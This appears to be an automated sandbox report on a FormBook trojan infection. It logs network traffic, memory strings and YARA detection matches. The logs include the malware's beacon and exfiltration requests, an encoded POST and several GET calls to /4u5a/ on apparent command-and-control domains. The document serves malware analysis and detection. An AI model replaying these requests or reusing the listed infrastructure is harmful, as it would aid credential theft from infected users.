20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:56 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bc54f76cb33-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bd20dfdcb0d-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bdedcba9b83-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: 1--Lt08NN.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 1--Lt08NN.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: NETSTAT.EXE, 0000000A.00000002.501856289.00000000042BE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: 1--Lt08NN.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
      Source: unknownDNS traffic detected: queries for: www.ope-cctv.com
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FF900
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013CE824
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1002
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013220A0
